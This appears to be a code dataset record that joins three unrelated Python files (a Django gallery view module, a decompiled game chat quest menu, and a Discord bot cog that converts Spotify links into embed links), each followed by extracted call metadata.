idDict[m.model][0] try: index = idDict[m.model].index(lastid) except ValueError: index = 0 if more and lastid != 0: index += 1 idDict[m.model] = idDict[m.model][index : index + BATCH_LENGTH] # perform the main query to retrieve the objects we want objDict[m.model] = m.model_class().objects.filter( id__in=idDict[m.model] ) objDict[m.model] = ( objDict[m.model] .select_related("author") .prefetch_related("tags") .order_by("-{}".format(orderby)) ) objDict[m.model] = list(objDict[m.model]) # combine and sort all objects by date objects = _sortObjects(orderby, **objDict) objects = objects[:BATCH_LENGTH] # Find out last ids lastids = {} for obj in objects: lastids["last_{}".format(modelmap[obj.__class__])] = obj.id for key, value in lastids.items(): request.session[key] = value # serialize objects for i in objects: res.append(i.json()) data["count"] = len(objects) if settings.DEBUG: data["queries"] = connection.queries res.value = data return JsonResponse(res.asDict()) def _sortObjects(orderby="created", **kwargs): """Sorts lists of objects and combines them into a single list""" o = [] for m in kwargs.values(): for l in iter(m): o.append(l) o = list(set(o)) sortfunc = _sortByCreated if orderby == "created" else _sortByModified if six.PY2: o.sort(sortfunc) else: o.sort(key=functools.cmp_to_key(sortfunc)) return o def _sortByCreated(a, b): """Sort function for object by created date""" if a.created < b.created: return 1 elif a.created > b.created: return -1 else: return 0 def _sortByModified(a, b): """Sort function for object by modified date""" if a.modified < b.modified: return 1 elif a.modified > b.modified: return -1 else: return 0 def search(query, model): """ Performs a search query and returns the object ids """ query = query.strip() LOGGER.debug(query) sqs = SearchQuerySet() results = sqs.raw_search("{}*".format(query)).models(model) if not results: results = sqs.raw_search("*{}".format(query)).models(model) if not results: results = sqs.raw_search("*{}*".format(query)).models(model) return [o.pk for o in results] @require_POST @login_required def subscribe(request, obj_id): gallery = Gallery.objects.get(pk=obj_id) data = json.loads(request.body)["body"] frequency = data.get("frequency", GallerySubscription.WEEKLY) sub, created = GallerySubscription.objects.get_or_create( gallery=gallery, user=request.user, frequency=frequency ) if not created: # it already existed so delete it sub.delete() return JsonResponse(Result().asDict())
[((73, 9, 73, 34), 'logging.getLogger', 'logging.getLogger', ({(73, 27, 73, 33): '"""frog"""'}, {}), "('frog')", False, 'import logging\n'), ((150, 17, 150, 59), 'frog.models.Gallery.objects.get_or_create', 'Gallery.objects.get_or_create', (), '', False, 'from frog.models import Gallery, Image, Video, Group, GallerySubscription, SiteConfig, Piece\n'), ((156, 10, 156, 18), 'frog.common.Result', 'Result', ({}, {}), '()', False, 'from frog.common import Result, getObjectsFromGuids, getClientIP\n'), ((170, 14, 170, 44), 'frog.models.Gallery.objects.get', 'Gallery.objects.get', (), '', False, 'from frog.models import Gallery, Image, Video, Group, GallerySubscription, SiteConfig, Piece\n'), ((188, 10, 188, 18), 'frog.common.Result', 'Result', ({}, {}), '()', False, 'from frog.common import Result, getObjectsFromGuids, getClientIP\n'), ((197, 11, 197, 35), 'json.loads', 'json.loads', ({(197, 22, 197, 34): 'request.body'}, {}), '(request.body)', False, 'import json\n'), ((199, 12, 199, 38), 'frog.common.getObjectsFromGuids', 'getObjectsFromGuids', ({(199, 32, 199, 37): 'guids'}, {}), '(guids)', False, 'from frog.common import Result, getObjectsFromGuids, getClientIP\n'), ((200, 14, 200, 44), 'frog.models.Gallery.objects.get', 'Gallery.objects.get', (), '', False, 'from frog.models import Gallery, Image, Video, Group, GallerySubscription, SiteConfig, Piece\n'), ((208, 10, 208, 18), 'frog.common.Result', 'Result', ({}, {}), '()', False, 'from frog.common import Result, getObjectsFromGuids, getClientIP\n'), ((266, 10, 266, 18), 'frog.common.Result', 'Result', ({}, {}), '()', False, 'from frog.common import Result, getObjectsFromGuids, getClientIP\n'), ((435, 10, 435, 26), 'haystack.query.SearchQuerySet', 'SearchQuerySet', ({}, {}), '()', False, 'from haystack.query import SearchQuerySet\n'), ((448, 14, 448, 44), 'frog.models.Gallery.objects.get', 'Gallery.objects.get', (), '', False, 'from frog.models import Gallery, Image, Video, Group, GallerySubscription, SiteConfig, Piece\n'), ((452, 19, 454, 5), 'frog.models.GallerySubscription.objects.get_or_create', 'GallerySubscription.objects.get_or_create', (), '', False, 'from frog.models import Gallery, Image, Video, Group, GallerySubscription, SiteConfig, Piece\n'), ((99, 14, 99, 44), 'frog.models.Gallery.objects.get', 'Gallery.objects.get', (), '', False, 'from frog.models import Gallery, Image, Video, Group, GallerySubscription, SiteConfig, Piece\n'), ((103, 14, 103, 22), 'frog.common.Result', 'Result', ({}, {}), '()', False, 'from frog.common import Result, getObjectsFromGuids, getClientIP\n'), ((121, 18, 121, 65), 'frog.models.Gallery.objects.filter', 'Gallery.objects.filter', (), '', False, 'from frog.models import Gallery, Image, Video, Group, GallerySubscription, SiteConfig, Piece\n'), ((143, 11, 143, 35), 'json.loads', 'json.loads', ({(143, 22, 143, 34): 'request.body'}, {}), '(request.body)', False, 'import json\n'), ((166, 11, 166, 35), 'json.loads', 'json.loads', ({(166, 22, 166, 34): 'request.body'}, {}), '(request.body)', False, 'import json\n'), ((174, 27, 174, 47), 'json.loads', 'json.loads', ({(174, 38, 174, 46): 'security'}, {}), '(security)', False, 'import json\n'), ((181, 16, 181, 42), 'frog.common.getObjectsFromGuids', 'getObjectsFromGuids', ({(181, 36, 181, 41): 'guids'}, {}), '(guids)', False, 'from frog.common import Result, getObjectsFromGuids, getClientIP\n'), ((222, 14, 222, 44), 'frog.models.Gallery.objects.get', 'Gallery.objects.get', (), '', False, 'from frog.models import Gallery, Image, Video, Group, GallerySubscription, SiteConfig, Piece\n'), ((232, 14, 232, 32), 'django.core.exceptions.PermissionDenied', 'PermissionDenied', ({}, {}), '()', False, 'from django.core.exceptions import ImproperlyConfigured, PermissionDenied\n'), ((240, 14, 240, 32), 'django.core.exceptions.PermissionDenied', 'PermissionDenied', ({}, {}), '()', False, 'from django.core.exceptions import ImproperlyConfigured, PermissionDenied\n'), ((449, 11, 449, 35), 'json.loads', 'json.loads', ({(449, 22, 449, 34): 'request.body'}, {}), '(request.body)', False, 'import json\n'), ((77, 17, 77, 61), 'django.contrib.contenttypes.models.ContentType.objects.filter', 'ContentType.objects.filter', (), '', False, 'from django.contrib.contenttypes.models import ContentType\n'), ((109, 23, 111, 13), 'frog.models.Gallery.objects.filter', 'Gallery.objects.filter', (), '', False, 'from frog.models import Gallery, Image, Video, Group, GallerySubscription, SiteConfig, Piece\n'), ((185, 26, 185, 54), 'frog.models.Gallery.objects.get', 'Gallery.objects.get', (), '', False, 'from frog.models import Gallery, Image, Video, Group, GallerySubscription, SiteConfig, Piece\n'), ((244, 18, 244, 36), 'django.core.exceptions.PermissionDenied', 'PermissionDenied', ({}, {}), '()', False, 'from django.core.exceptions import ImproperlyConfigured, PermissionDenied\n'), ((142, 37, 142, 58), 'frog.models.Gallery.objects.all', 'Gallery.objects.all', ({}, {}), '()', False, 'from frog.models import Gallery, Image, Video, Group, GallerySubscription, SiteConfig, Piece\n'), ((229, 16, 229, 36), 'frog.common.getClientIP', 'getClientIP', ({(229, 28, 229, 35): 'request'}, {}), '(request)', False, 'from frog.common import Result, getObjectsFromGuids, getClientIP\n'), ((237, 16, 237, 36), 'frog.common.getClientIP', 'getClientIP', ({(237, 28, 237, 35): 'request'}, {}), '(request)', False, 'from frog.common import Result, getObjectsFromGuids, getClientIP\n'), ((406, 19, 406, 49), 'functools.cmp_to_key', 'functools.cmp_to_key', ({(406, 40, 406, 48): 'sortfunc'}, {}), '(sortfunc)', False, 'import functools\n'), ((460, 24, 460, 32), 'frog.common.Result', 'Result', ({}, {}), '()', False, 'from frog.common import Result, getObjectsFromGuids, getClientIP\n'), ((295, 29, 295, 47), 'django.db.models.Q', 'Q', (), '', False, 'from django.db.models import Q, Count\n'), ((317, 29, 317, 48), 'django.db.models.Q', 'Q', (), '', False, 'from django.db.models import Q, Count\n'), ((294, 32, 294, 35), 'django.db.models.Q', 'Q', ({}, {}), '()', False, 'from django.db.models import Q, Count\n'), ((301, 29, 301, 45), 'django.db.models.Q', 'Q', (), '', False, 'from django.db.models import Q, Count\n'), ((316, 32, 316, 35), 'django.db.models.Q', 'Q', ({}, {}), '()', False, 'from django.db.models import Q, Count\n'), ((292, 58, 292, 71), 'django.db.models.Count', 'Count', ({(292, 64, 292, 70): '"""tags"""'}, {}), "('tags')", False, 'from django.db.models import Q, Count\n'), ((300, 32, 300, 35), 'django.db.models.Q', 'Q', ({}, {}), '()', False, 'from django.db.models import Q, Count\n'), ((309, 33, 309, 57), 'django.db.models.Q', 'Q', (), '', False, 'from django.db.models import Q, Count\n'), ((307, 36, 307, 39), 'django.db.models.Q', 'Q', ({}, {}), '()', False, 'from django.db.models import Q, Count\n'), ((323, 43, 323, 56), 'django.db.models.Count', 'Count', ({(323, 49, 323, 55): '"""tags"""'}, {}), "('tags')", False, 'from django.db.models import Q, Count\n')]
itsyaboyrocket/pirates
pirates/speedchat/PSpeedChatQuestMenu.py
6ca1e7d571c670b0d976f65e608235707b5737e3
# uncompyle6 version 3.2.0 # Python bytecode 2.4 (62061) # Decompiled from: Python 2.7.14 (v2.7.14:84471935ed, Sep 16 2017, 20:19:30) [MSC v.1500 32 bit (Intel)] # Embedded file name: pirates.speedchat.PSpeedChatQuestMenu from otp.speedchat.SCMenu import SCMenu from otp.speedchat.SCTerminal import * from otp.speedchat.SCStaticTextTerminal import SCStaticTextTerminal from pirates.quest.Quest import Quest from pirates.speedchat.PSpeedChatQuestTerminal import * from pirates.pirate.LocalPirate import * from pirates.quest.QuestStatus import * from pirates.quest.QuestDNA import * class PSpeedChatQuestMenu(SCMenu): __module__ = __name__ def __init__(self): SCMenu.__init__(self) self.accept('localAvatarQuestAdded', self.__questMenuRefresh) self.accept('localAvatarQuestUpdate', self.__questMenuRefresh) self.accept('localAvatarQuestItemUpdate', self.__questMenuRefresh) self.accept('localAvatarQuestComplete', self.__questMenuRefresh) self.accept('localAvatarQuestDeleted', self.__questMenuRefresh) def destroy(self): SCMenu.destroy(self) def __questMenuRefresh(self, quest, item=None, note=None): self.clearMenu() quests = localAvatar.questStatus.getCurrentQuests() if quests is None: return for quest in quests: q = quest if q is None: continue if not q.isComplete(): self.__questAddSCChat(q) return def __questAddSCChat(self, quest): qId = quest.questId qDNA = QuestDB.QuestDict.get(qId) if not qDNA: return qInt = qDNA.questInt i = 0 for task in quest.questDNA.getTasks(): if len(quest.getSCSummaryText(0)) > 2: self.append(PSpeedChatQuestTerminal(quest.getSCSummaryText(i), qInt, quest.giverId, 0, i)) if len(quest.getSCWhereIsText(0)) > 2: self.append(PSpeedChatQuestTerminal(quest.getSCWhereIsText(i), qInt, quest.giverId, 1, i)) if len(quest.getSCHowToText(0)) > 2: self.append(PSpeedChatQuestTerminal(quest.getSCHowToText(i), qInt, quest.giverId, 2, i)) i = i + 1
[((18, 8, 18, 29), 'otp.speedchat.SCMenu.SCMenu.__init__', 'SCMenu.__init__', ({(18, 24, 18, 28): 'self'}, {}), '(self)', False, 'from otp.speedchat.SCMenu import SCMenu\n'), ((26, 8, 26, 28), 'otp.speedchat.SCMenu.SCMenu.destroy', 'SCMenu.destroy', ({(26, 23, 26, 27): 'self'}, {}), '(self)', False, 'from otp.speedchat.SCMenu import SCMenu\n')]
R3XET/coffee-cogs
spotifyembed/spotifyembed.py
e7658213449ec140edaaf322514eaafb575f99bd
# from redbot.core import Config from redbot.core import Config, commands, checks import asyncio import aiohttp import discord from discord import Webhook, AsyncWebhookAdapter import re class Spotifyembed(commands.Cog): """Automatically send a reply to Spotify links with a link to the embed preview. Convenient for mobile users who can finally listen to music samples from Discord, without needing an account.""" def __init__(self, bot): self.bot = bot self.config = Config.get_conf(self, identifier=806715409318936616) default_guild = { "spotifyembedEnabled": False, } self.config.register_guild(**default_guild) @commands.group(aliases=["setspembed", "setspe"]) @checks.guildowner_or_permissions() async def setspotifyembed(self, ctx: commands.Context): """Set Spotify Embed settings""" if not ctx.invoked_subcommand: # Guild settings e = discord.Embed(color=(await ctx.embed_colour()), title="Guild Settings", description="") e.add_field(name="spotifyembedEnabled", value=(await self.config.guild(ctx.guild).spotifyembedEnabled()), inline=False) await ctx.send(embed=e) @setspotifyembed.command(name="enable") async def setspembedenable(self, ctx): """Enable auto-responding to Spotify links""" await self.config.guild(ctx.guild).spotifyembedEnabled.set(True) await ctx.message.add_reaction("✅") @setspotifyembed.command(name="disable") async def setspembeddisable(self, ctx): """Disable auto-responding to Spotify links""" await self.config.guild(ctx.guild).spotifyembedEnabled.set(False) await ctx.message.add_reaction("✅") @commands.command(aliases=["spembed", "spe"]) async def spotifyembed(self, ctx, spotifyLink, asMyself: bool=False): """Return a Spotify embed link Can set asMyself to true/false, for sending as webhook""" spembedSplit = spotifyLink.split('.com/') sendMsg = spembedSplit[0] + ".com/embed/" + spembedSplit[1] if asMyself == False: return await ctx.send(sendMsg) elif asMyself == True: # Find a webhook that the bot made try: whooklist = await ctx.channel.webhooks() whurl = "" # Return if match for wh in whooklist: if self.bot.user == wh.user: whurl = wh.url # Make new webhook if one didn't exist if whurl == "": newHook = await ctx.channel.create_webhook(name="Webhook") whurl = newHook.url async with aiohttp.ClientSession() as session: webhook = Webhook.from_url(whurl, adapter=AsyncWebhookAdapter(session)) await webhook.send( sendMsg, username=ctx.author.display_name, avatar_url=ctx.author.avatar_url, ) except discord.errors.Forbidden: return await ctx.send(sendMsg) else: return await ctx.send("An error occurred.") @commands.Cog.listener() async def on_message(self, message: discord.Message): if message.author.bot: return if message.webhook_id: return if message.guild is None: return spotifyembedEnabled = await self.config.guild(message.guild).spotifyembedEnabled() if spotifyembedEnabled is not True: return # Ignore if we find [p]spotifyembed in the trigger message spembedCommandIgnore = r"^\S{1,9}(spotifyembed|spembed|spe)(?=\s|$)" spembedCommands = re.findall(spembedCommandIgnore, message.clean_content) if len(spembedCommands) > 0: return # Ignore if we find no spotify links in the trigger message spembedFinder = r"https\:\/\/open\.spotify\.com\/\w{4,12}\/\w{14,26}(?=\?|$|\s)" spembedMatches = re.findall(spembedFinder, message.clean_content) if len(spembedMatches) <= 0: return sendMsg = "" for match in spembedMatches: spembedSplit = match.split('.com/') sendMsg += spembedSplit[0] + ".com/embed/" + spembedSplit[1] + "\n" # Find a webhook that the bot made try: whooklist = await message.channel.webhooks() whurl = "" # Return if match for wh in whooklist: if self.bot.user == wh.user: whurl = wh.url # Make new webhook if one didn't exist if whurl == "": newHook = await message.channel.create_webhook(name="Webhook") whurl = newHook.url async with aiohttp.ClientSession() as session: webhook = Webhook.from_url(whurl, adapter=AsyncWebhookAdapter(session)) await webhook.send( sendMsg, username=message.author.display_name, avatar_url=message.author.avatar_url, ) except discord.errors.Forbidden: return await message.channel.send(sendMsg)
[((21, 5, 21, 53), 'redbot.core.commands.group', 'commands.group', (), '', False, 'from redbot.core import Config, commands, checks\n'), ((22, 5, 22, 39), 'redbot.core.checks.guildowner_or_permissions', 'checks.guildowner_or_permissions', ({}, {}), '()', False, 'from redbot.core import Config, commands, checks\n'), ((43, 5, 43, 49), 'redbot.core.commands.command', 'commands.command', (), '', False, 'from redbot.core import Config, commands, checks\n'), ((79, 5, 79, 28), 'redbot.core.commands.Cog.listener', 'commands.Cog.listener', ({}, {}), '()', False, 'from redbot.core import Config, commands, checks\n'), ((14, 22, 14, 74), 'redbot.core.Config.get_conf', 'Config.get_conf', (), '', False, 'from redbot.core import Config, commands, checks\n'), ((92, 26, 92, 81), 're.findall', 're.findall', ({(92, 37, 92, 57): 'spembedCommandIgnore', (92, 59, 92, 80): 'message.clean_content'}, {}), '(spembedCommandIgnore, message.clean_content)', False, 'import re\n'), ((97, 25, 97, 73), 're.findall', 're.findall', ({(97, 36, 97, 49): 'spembedFinder', (97, 51, 97, 72): 'message.clean_content'}, {}), '(spembedFinder, message.clean_content)', False, 'import re\n'), ((120, 23, 120, 46), 'aiohttp.ClientSession', 'aiohttp.ClientSession', ({}, {}), '()', False, 'import aiohttp\n'), ((67, 27, 67, 50), 'aiohttp.ClientSession', 'aiohttp.ClientSession', ({}, {}), '()', False, 'import aiohttp\n'), ((121, 58, 121, 86), 'discord.AsyncWebhookAdapter', 'AsyncWebhookAdapter', ({(121, 78, 121, 85): 'session'}, {}), '(session)', False, 'from discord import Webhook, AsyncWebhookAdapter\n'), ((68, 62, 68, 90), 'discord.AsyncWebhookAdapter', 'AsyncWebhookAdapter', ({(68, 82, 68, 89): 'session'}, {}), '(session)', False, 'from discord import Webhook, AsyncWebhookAdapter\n')]